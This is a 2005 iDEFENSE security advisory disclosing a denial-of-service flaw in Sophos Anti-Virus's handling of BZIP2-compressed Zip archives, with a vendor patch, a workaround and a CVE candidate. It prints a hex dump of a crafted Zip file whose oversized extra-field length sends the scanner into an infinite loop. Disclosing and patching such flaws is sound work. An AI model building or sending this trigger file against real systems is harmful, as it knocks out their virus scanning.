Sophos Anti-Virus Zip File Handling DoS Vulnerability iDEFENSE Security Advisory 07.14.05 www.idefense.com/application/poi/display?id=283&type=vulnerabilities July 14, 2005 I. BACKGROUND Sophos Small Business Suite includes the Sophos PureMessage Small Business Edition, combining virus and spam protection for the email gateway, and Sophos Anti-Virus Small Business Edition, which offers desktop and server defense against the virus threat. More information is available at: http://www.sophos.com II. DESCRIPTION Remote exploitation of a denial of service vulnerability in Sophos Plc.'s Sophos Anti-Virus engine allows attackers to exhaust CPU resources on the target system and prevent further scans. The problem specifically exists in the handling of Zip files compressed using the BZIP2 algorithm. When scanning within a BZIP2 archive the Sophos engine will not perform any sanity checks on the 'Extra field length' value. By specifying an abnormally large value for this field the analysis routine is forced into an infinite loop leading to CPU exhaustion. The following is a hex dump of an example file that will trigger the issue: 00 50 4b 03 04 0a 00 00 00 0c 00 5c 84 67 32 5b 26 |PK........\.g2[&| 10 b9 09 01 00 00 00 01 00 00 00 03 00 ff ff 66 6f |..............fo| 20 6f 55 54 09 00 03 a0 74 2c 42 a1 74 2c 42 55 78 |oUT....t,B.t,BUx| 30 04 00 e8 03 e8 03 2a 50 4b 01 02 17 03 0a 00 00 |......*PK.......| 40 00 00 00 5c 84 67 32 5b 26 b9 09 01 00 00 00 01 |...\.g2[&.......| 50 00 00 00 03 00 0d 00 00 00 00 00 01 00 00 00 a4 |................| 60 81 00 00 00 00 66 6f 6f 55 54 05 00 03 a0 74 2c |.....fooUT....t,| 70 42 55 78 00 00 50 4b 05 06 00 00 00 00 01 00 01 |BUx..PK.........| 80 00 3e 00 00 00 37 00 00 00 00 00 |.>...7.....| Bytes 08-09: Compression method - 0x000c == BZIP2 algorithm Bytes 28-29: Extra field length - 0xffff The function BZ2_decompress(), among others, is called within the infinite loop. III. ANALYSIS Successful exploitation allows remote attackers to trigger a denial of service condition on the target system. Remote exploitation can be achieved by sending a malicious file in an e-mail message or during an HTTP session. Exploitation is only possible if the 'Scan inside archive files' option is enabled. This is not a default option but is a common setting. Both Unix and Windows systems running a vulnerable version of Sophos Anti-Virus are affected. IV. DETECTION iDEFENSE has confirmed the existence of this vulnerability against Sophos Anti-Virus version 5.0.1. Exploitation is reliant on the non-default option "Scan inside archive files" found under the "On-access scanning" configuration panel. It has been reported that Sophos Anti-Virus versions 3.91 and 3.90 are also vulnerable. It is suspected that earlier versions are also susceptible to exploitation. The vulnerability exists across both the Unix and Microsoft Windows platforms. V. WORKAROUND Disable the "Scan inside archive files" option until a vendor fix is made available. VI. VENDOR RESPONSE "We have now included protection against this vulnerability into the latest versions of Sophos Anti-Virus on Windows, UNIX, Linux, Netware, OpenVMS and Mac OSX (version 3.95.0 on all those platforms as well as version 5.0.4 on Windows 2000/XP/2003 and versions 4.5.3 on Windows NT and Windows 95/98/Me) as well as into the latest updated versions of PureMessage for UNIX, PureMessage for Windows/Exchange and MailMonitor (any version running anti-virus engine 2.30.4 or above) All of these versions would be updated automatically to customers using our automatic updating through EM Library or direct from Sophos. They are also available to customers to download at http://www.sophos.com/support/updates" VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-1530 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/12/2005 Initial vendor notification 05/16/2005 Initial vendor response 07/14/2005 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright (c) 2005 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email customerservice@private for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
This archive was generated by hypermail 2.1.3 : Fri Jul 15 2005 - 08:06:01 PDT